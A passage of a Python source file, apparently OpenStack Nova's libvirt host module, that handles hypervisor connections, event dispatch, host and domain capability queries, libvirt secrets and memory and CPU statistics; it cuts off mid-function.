# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
from collections import defaultdict
import inspect
import operator
import os
import socket
import threading
import traceback
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova.compute import utils as compute_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
from nova.virt.libvirt import migration as libvirt_migrate
from nova.virt.libvirt import utils as libvirt_utils
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = nova.conf.CONF
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
SEV_KERNEL_PARAM_FILE = '/sys/module/kvm_amd/parameters/sev'
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._initial_connection = True
self._conn_event_handler = conn_event_handler
self._conn_event_handler_queue = six.moves.queue.Queue()
self._lifecycle_event_handler = lifecycle_event_handler
self._caps = None
self._domain_caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
self._initialized = False
self._libvirt_proxy_classes = self._get_libvirt_proxy_classes(libvirt)
self._libvirt_proxy = self._wrap_libvirt_proxy(libvirt)
# AMD SEV is conditional on support in the hardware, kernel,
# qemu, and libvirt. This is determined on demand and
# memoized by the supports_amd_sev property below.
self._supports_amd_sev = None
self._has_hyperthreading = None
@staticmethod
def _get_libvirt_proxy_classes(libvirt_module):
"""Return a tuple for tpool.Proxy's autowrap argument containing all
classes defined by the libvirt module except libvirtError.
"""
# Get a list of (name, class) tuples of libvirt classes
classes = inspect.getmembers(libvirt_module, inspect.isclass)
# Return a list of just the classes, filtering out libvirtError because
# we don't need to proxy that
return tuple([cls[1] for cls in classes if cls[0] != 'libvirtError'])
def _wrap_libvirt_proxy(self, obj):
"""Return an object wrapped in a tpool.Proxy using autowrap appropriate
for the libvirt module.
"""
# libvirt is not pure python, so eventlet monkey patching doesn't work
# on it. Consequently long-running libvirt calls will not yield to
# eventlet's event loop, starving all other greenthreads until
# completion. eventlet's tpool.Proxy handles this situation for us by
# executing proxied calls in a native thread.
return tpool.Proxy(obj, autowrap=self._libvirt_proxy_classes)
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
def _conn_event_thread(self):
"""Dispatches async connection events"""
# NOTE(mdbooth): This thread doesn't need to jump through the same
# hoops as _dispatch_thread because it doesn't interact directly
# with the libvirt native thread.
while True:
self._dispatch_conn_event()
def _dispatch_conn_event(self):
# NOTE(mdbooth): Splitting out this loop looks redundant, but it
# means we can easily dispatch events synchronously from tests and
# it isn't completely awful.
handler = self._conn_event_handler_queue.get()
try:
handler()
except Exception:
LOG.exception(_('Exception handling connection event'))
finally:
self._conn_event_handler_queue.task_done()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
if detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_POSTCOPY:
transition = virtevent.EVENT_LIFECYCLE_POSTCOPY_STARTED
elif detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED:
# VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED is also sent when live
# migration of the guest fails, so we cannot simply rely
# on the event itself but need to check if the job itself was
# successful.
# NOTE(mriedem): The job check logic here is copied from
# LibvirtDriver._live_migration_monitor.
guest = libvirt_guest.Guest(dom)
info = guest.get_job_info()
if info.type == libvirt.VIR_DOMAIN_JOB_NONE:
# Either still running, or failed or completed,
# lets untangle the mess.
info.type = libvirt_migrate.find_job_type(
guest, instance=None, logging_ok=False)
if info.type == libvirt.VIR_DOMAIN_JOB_COMPLETED:
transition = virtevent.EVENT_LIFECYCLE_MIGRATION_COMPLETED
else:
# Failed or some other status we don't know about, so just
# opt to report the guest is paused.
transition = virtevent.EVENT_LIFECYCLE_PAUSED
else:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.InternalError(
_("Can not handle authentication request for %d credentials")
% len(creds))
def _connect(self, uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
return self._libvirt_proxy.openAuth(uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
self._queue_conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
# This will raise an exception on failure
wrapped_conn = self._connect(self._uri, self._read_only)
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warning("URI %(uri)s does not support events: %(error)s",
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warning("URI %(uri)s does not support connection"
" events: %(error)s",
{'uri': self._uri, 'error': e})
return wrapped_conn
def _queue_conn_event_handler(self, *args, **kwargs):
if self._conn_event_handler is None:
return
def handler():
return self._conn_event_handler(*args, **kwargs)
self._conn_event_handler_queue.put(handler)
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
# Drop the existing connection if it is not usable
if (self._wrapped_conn is not None and
not self._test_connection(self._wrapped_conn)):
self._wrapped_conn = None
# Connection was previously up, and went down
self._queue_conn_event_handler(
False, _('Connection to libvirt lost'))
if self._wrapped_conn is None:
try:
# This will raise if it fails to get a connection
self._wrapped_conn = self._get_new_connection()
except Exception as ex:
with excutils.save_and_reraise_exception():
# If we previously had a connection and it went down,
# we generated a down event for that above.
# We also want to generate a down event for an initial
# failure, which won't be handled above.
if self._initial_connection:
self._queue_conn_event_handler(
False,
_('Failed to connect to libvirt: %(msg)s') %
{'msg': ex})
finally:
self._initial_connection = False
self._queue_conn_event_handler(True, None)
return self._wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
ctxt = nova_context.get_admin_context()
rpc.get_notifier('compute').error(ctxt,
'compute.libvirt.error',
payload)
compute_utils.notify_about_libvirt_connect_error(
ctxt, ip=CONF.my_ip, exception=ex, tb=traceback.format_exc())
raise exception.HypervisorUnavailable()
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
if self._initialized:
return
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
LOG.debug("Starting connection event dispatch thread")
utils.spawn(self._conn_event_thread)
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
def get_guest(self, instance):
"""Retrieve libvirt guest object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
return libvirt_guest.Guest(self._get_domain(instance))
def _get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a libvirt.Domain object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
try:
conn = self.get_connection()
return conn.lookupByUUIDString(instance.uuid)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance.uuid)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance.name,
'error_code': error_code,
'ex': ex})
raise exception.InternalError(msg)
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
# listAllDomains() returns <list of virDomain>, not <virDomain>, so
# tpool.Proxy's autowrap won't catch it. We need to wrap the
# contents of the list we return.
alldoms = (self._wrap_libvirt_proxy(dom)
for dom in self.get_connection().listAllDomains(flags))
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
:returns: set of online CPUs, raises libvirtError on error
"""
cpus, cpu_map, online = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_cpu_model_names(self):
"""Get the cpu models based on host CPU arch
:returns: a list of cpu models which supported by the given CPU arch
"""
arch = self.get_capabilities().host.cpu.arch
return self.get_connection().getCPUModelNames(arch)
@staticmethod
def _log_host_capabilities(xmlstr):
# NOTE(mriedem): This looks a bit weird but we do this so we can stub
# out this method in unit/functional test runs since the xml string is
# big and it can cause subunit parsing to fail (see bug 1813147).
LOG.info("Libvirt host capabilities %s", xmlstr)
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
self._log_host_capabilities(xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt,
'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES') and
self._caps.host.cpu.model is not None):
try:
xml_str = self._caps.host.cpu.to_xml()
if six.PY3 and isinstance(xml_str, six.binary_type):
xml_str = xml_str.decode('utf-8')
features = self.get_connection().baselineCPU(
[xml_str],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support full set"
" of host capabilities: %(error)s",
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_domain_capabilities(self):
"""Returns the capabilities you can request when creating a
domain (VM) with that hypervisor, for various combinations of
architecture and machine type.
In this context the fuzzy word "hypervisor" implies QEMU
binary, libvirt itself and the host config. libvirt provides
this in order that callers can determine what the underlying
emulator and/or libvirt is capable of, prior to creating a domain
(for instance via virDomainCreateXML or virDomainDefineXML).
However nova needs to know the capabilities much earlier, when
the host's compute service is first initialised, in order that
placement decisions can be made across many compute hosts.
Therefore this is expected to be called during the init_host()
phase of the driver lifecycle rather than just before booting
an instance.
This causes an additional complication since the Python
binding for this libvirt API call requires the architecture
and machine type to be provided. So in order to gain a full
picture of the hypervisor's capabilities, technically we need
to call it with the right parameters, once for each
(architecture, machine_type) combination which we care about.
However the libvirt experts have advised us that in practice
the domain capabilities do not (yet, at least) vary enough
across machine types to justify the cost of calling
getDomainCapabilities() once for every single (architecture,
machine_type) combination. In particular, SEV support isn't
reported per-machine type, and since there are usually many
machine types, we heed the advice of the experts that it's
typically sufficient to call it once per host architecture:
https://bugzilla.redhat.com/show_bug.cgi?id=1683471#c7
However, that's not quite sufficient in the context of nova,
because SEV guests typically require a q35 machine type, as do
KVM/QEMU guests that want Secure Boot, whereas the current
default machine type for x86_64 is 'pc'. So we need results
from the getDomainCapabilities API for at least those two.
Fortunately we can take advantage of the results from the
getCapabilities API which marks selected machine types as
canonical, e.g.:
<machine canonical='pc-i440fx-2.11' maxCpus='255'>pc</machine>
<machine canonical='pc-q35-2.11' maxCpus='288'>q35</machine>
So for now, we call getDomainCapabilities for these canonical
machine types of each architecture, plus for the
architecture's default machine type, if that is not one of the
canonical types.
Future domain capabilities might report SEV in a more
fine-grained manner, and we also expect to use this method to
detect other features, such as for gracefully handling machine
types and potentially for detecting OVMF binaries. Therefore
we memoize the results of the API calls in a nested dict where
the top-level keys are architectures, and second-level keys
are machine types, in order to allow easy expansion later.
Whenever libvirt/QEMU are updated, cached domCapabilities
would get outdated (because QEMU will contain new features and
the capabilities will vary). However, this should not be a
problem here, because when libvirt/QEMU gets updated, the
nova-compute agent also needs restarting, at which point the
memoization will vanish because it's not persisted to disk.
Note: The result is cached in the member attribute
_domain_caps.
:returns: a nested dict of dicts which maps architectures to
machine types to instances of config.LibvirtConfigDomainCaps
representing the domain capabilities of the host for that arch
and machine type:
{ arch:
{ machine_type: LibvirtConfigDomainCaps }
}
"""
if self._domain_caps:
return self._domain_caps
domain_caps = defaultdict(dict)
caps = self.get_capabilities()
virt_type = CONF.libvirt.virt_type
for guest in caps.guests:
arch = guest.arch
domain = guest.domains.get(virt_type, guest.default_domain)
for machine_type in self._get_machine_types(arch, domain):
# It is expected that if there are multiple <guest>
# elements, each will have a different architecture;
# for example, on x86 hosts one <guest> will contain
# <arch name='i686'> and one will contain <arch
# name='x86_64'>. But it doesn't hurt to add a safety
# net to avoid needlessly calling libvirt's API more
# times than we need.
if machine_type and machine_type in domain_caps[arch]:
continue
self._add_to_domain_capabilities(domain.emulator, arch,
domain_caps, machine_type,
virt_type)
# NOTE(aspiers): Use a temporary variable to update the
# instance variable atomically, otherwise if some API
# calls succeeded and then one failed, we might
# accidentally memoize a partial result.
self._domain_caps = domain_caps
return self._domain_caps
def _get_machine_types(self, arch, domain):
"""Get the machine types for this architecture for which we need to
call getDomainCapabilities, i.e. the canonical machine types,
and the default machine type (if it's not one of the canonical
machine types).
See the docstring for get_domain_capabilities() for an explanation
of why we choose this set of machine types.
"""
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# See _add_to_domain_capabilities() below for how this is handled.
mtypes = set([libvirt_utils.get_default_machine_type(arch)])
mtypes.update(domain.aliases.keys())
LOG.debug("Getting domain capabilities for %(arch)s via "
"machine types: %(mtypes)s",
{'arch': arch, 'mtypes': mtypes})
return mtypes
def _add_to_domain_capabilities(self, emulator_bin, arch, domain_caps,
machine_type, virt_type):
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# In that case we pass a machine_type of None to the libvirt
# API and rely on it choosing a sensible default which will be
# returned in the <machine> element. It could also be an
# alias like 'pc' rather than a full machine type.
#
# NOTE(kchamart): Prior to libvirt v4.7.0 libvirt picked its
# default machine type for x86, 'pc', as reported by QEMU's
# default. From libvirt v4.7.0 onwards, libvirt _explicitly_
# declared the "preferred" default for x86 as 'pc' (and
# appropriate values for other architectures), and only uses
# QEMU's reported default (whatever that may be) if 'pc' does
# not exist. This was done "to isolate applications from
# hypervisor changes that may cause incompatibilities" --
# i.e. if, or when, QEMU changes its default machine type to
# something else. Refer to this libvirt commit:
#
# https://libvirt.org/git/?p=libvirt.git;a=commit;h=26cfb1a3
try:
cap_obj = self._get_domain_capabilities(
emulator_bin=emulator_bin, arch=arch,
machine_type=machine_type, virt_type=virt_type)
except libvirt.libvirtError as ex:
# NOTE(sean-k-mooney): This can happen for several
# reasons, but one common example is if you have
# multiple QEMU emulators installed and you set
# virt-type=kvm. In this case any non-native emulator,
# e.g. AArch64 on an x86 host, will (correctly) raise
# an exception as KVM cannot be used to accelerate CPU
# instructions for non-native architectures.
error_code = ex.get_error_code()
LOG.debug(
"Error from libvirt when retrieving domain capabilities "
"for arch %(arch)s / virt_type %(virt_type)s / "
"machine_type %(mach_type)s: "
"[Error Code %(error_code)s]: %(exception)s",
{'arch': arch, 'virt_type': virt_type,
'mach_type': machine_type, 'error_code': error_code,
'exception': ex})
# Remove archs added by default dict lookup when checking
# if the machine type has already been recoded.
if arch in domain_caps:
domain_caps.pop(arch)
return
# Register the domain caps using the expanded form of
# machine type returned by libvirt in the <machine>
# element (e.g. pc-i440fx-2.11)
if cap_obj.machine_type:
domain_caps[arch][cap_obj.machine_type] = cap_obj
else:
# NOTE(aspiers): In theory this should never happen,
# but better safe than sorry.
LOG.warning(
"libvirt getDomainCapabilities("
"emulator_bin=%(emulator_bin)s, arch=%(arch)s, "
"machine_type=%(machine_type)s, virt_type=%(virt_type)s) "
"returned null <machine> type",
{'emulator_bin': emulator_bin, 'arch': arch,
'machine_type': machine_type, 'virt_type': virt_type}
)
# And if we passed an alias, register the domain caps
# under that too.
if machine_type and machine_type != cap_obj.machine_type:
domain_caps[arch][machine_type] = cap_obj
cap_obj.machine_type_alias = machine_type
def _get_domain_capabilities(self, emulator_bin=None, arch=None,
machine_type=None, virt_type=None, flags=0):
xmlstr = self.get_connection().getDomainCapabilities(
emulator_bin,
arch,
machine_type,
virt_type,
flags
)
LOG.debug("Libvirt host hypervisor capabilities for arch=%s and "
"machine_type=%s:\n%s", arch, machine_type, xmlstr)
caps = vconfig.LibvirtConfigDomainCaps()
caps.parse_str(xmlstr)
return caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.',
{'old': self._hostname, 'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
:param usage_id: name of resource in secret
:param password: optional secret value to set
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s', xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error('Error defining a secret with XML: %s', xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
if CONF.libvirt.file_backed_memory > 0:
return CONF.libvirt.file_backed_memory
else:
return self._get_hardware_info()[1]
def _sum_domain_memory_mb(self, include_host=True):
"""Get the total memory consumed by guest domains
If include_host is True, subtract available host memory from guest 0
to get real used memory within dom0 within xen
"""
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info()[2])
except libvirt.libvirtError as e:
LOG.warning("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s",
{"uuid": guest.uuid, "ex": e})
continue
if include_host and guest.id == 0:
# Memory usage for the host domain (dom0 in xen) is the
# reported memory minus available memory
used += (dom_mem - self._get_avail_memory_kb())
else:
used += dom_mem
# Convert it to MB
return used // units.Ki
@staticmethod
def _get_avail_memory_kb():
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
avail = int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1])
return avail
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if CONF.libvirt.virt_type == 'xen':
# For xen, report the sum of all domains, with
return self._sum_domain_memory_mb(include_host=True)
elif CONF.libvirt.file_backed_memory > 0:
# For file_backed_memory, report the total usage of guests,
# ignoring host memory
return self._sum_domain_memory_mb(include_host=False)
else:
return (self.get_memory_mb_total() -
(self._get_avail_memory_kb() // units.Ki))
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: an instance of Guest
"""
if six.PY2:
